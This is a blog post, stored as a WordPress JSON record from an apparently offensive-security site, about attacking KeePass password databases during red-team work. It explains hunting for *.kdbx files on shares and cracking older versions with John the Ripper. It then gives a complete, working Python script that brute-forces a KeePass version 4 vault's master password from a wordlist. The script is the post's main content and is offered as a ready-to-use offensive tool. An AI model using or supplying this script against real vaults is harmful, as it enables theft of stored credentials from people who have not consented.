{"id":581,"date":"2025-02-20T23:56:43","date_gmt":"2025-02-21T04:56:43","guid":{"rendered":"https:\/\/offensivepython.com\/?p=581"},"modified":"2025-02-21T00:10:38","modified_gmt":"2025-02-21T05:10:38","slug":"guessing-keypass-version-4-passwords","status":"publish","type":"post","link":"https:\/\/offensivepython.com\/index.php\/2025\/02\/20\/guessing-keypass-version-4-passwords\/","title":{"rendered":"Guessing KeyPass version 4 Passwords"},"content":{"rendered":"\t\t
\n\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

Earlier versions of the commonly used KeyPass password manager software was a blessing in disguise whenever you would come across those files during a Red Team and they were easy to find. Just search for *.kdbx files on shares!<\/p>\n

<\/p>\n

The password hashes from the KDBX files were easily extracted using John The Ripper’s keepass2john tool. And then you could use John and your favorite wordlist to quickly crack some passwords, which then led to more credentials that the user thought they were protecting. It was so much fun and always an easy win.<\/p>\n

<\/p>\n

However, with version 4 of KeyPass, John can no long extract the hash and cracking is not possible. But we can still guess the passwords. I recently discovered that there is a module known as pykeepass<\/a> and it makes writing a KeePass password guesser very easy in Python. Here is one I just wrote real quick.<\/p>\n

from <\/span>pykeepass import <\/span>PyKeePass, <\/span>exceptions
from <\/span>sys import <\/span>argv
from <\/span>os.path import <\/span>basename

# Supply the version 4 KeePass file as an argument
<\/span>if <\/span>len<\/span>(argv) != 2<\/span>:
    print<\/span>(basename(argv[0<\/span>]), <\/span>\"KeyPass.kdbx\"<\/span>)
    exit<\/span>()

# Set the password file to use
<\/span>PASSWORDS = \"\/tmp\/passwords.txt\"
<\/span>
<\/span># Read in each password to try
<\/span>with <\/span>open<\/span>(PASSWORDS) as <\/span>passwords:
    for <\/span>password in <\/span>passwords:
        # strip off the line feed at the end
<\/span>        <\/span>password = password.rstrip()
        try<\/span>:
            # This prints the password being tried on the same line each time through the loop
<\/span>            <\/span>print<\/span>(\"<\/span>\\r<\/span>\" <\/span>+ password + \"<\/span>\\033<\/span>[K\"<\/span>, <\/span>end<\/span>=\"\"<\/span>, <\/span>flush<\/span>=True<\/span>)
            kp = PyKeePass(argv[1<\/span>], <\/span>password<\/span>=password)
        except <\/span>exceptions.CredentialsError:
            continue
<\/span>        else<\/span>:
            print<\/span>(\"<\/span>\\n<\/span>You guessed it!\"<\/span>)
            exit<\/span>()
    print<\/span>(\"<\/span>\\n<\/span>The password could not be guessed.\"<\/span>)<\/pre><\/div>\n
<\/p>\n
<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"
Earlier versions of the commonly used KeyPass password manager software was a blessing in disguise whenever you would come across those files during a Red Team and they were easy to find. Just search for *.kdbx files on shares! The password hashes from the KDBX files were easily extracted using John The Ripper’s keepass2john tool. […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","site-transparent-header":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[35],"tags":[38],"class_list":["post-581","post","type-post","status-publish","format-standard","hentry","category-offensive-tool","tag-keepass"],"_links":{"self":[{"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/posts\/581","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/comments?post=581"}],"version-history":[{"count":12,"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/posts\/581\/revisions"}],"predecessor-version":[{"id":593,"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/posts\/581\/revisions\/593"}],"wp:attachment":[{"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/media?parent=581"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/categories?post=581"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/tags?post=581"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}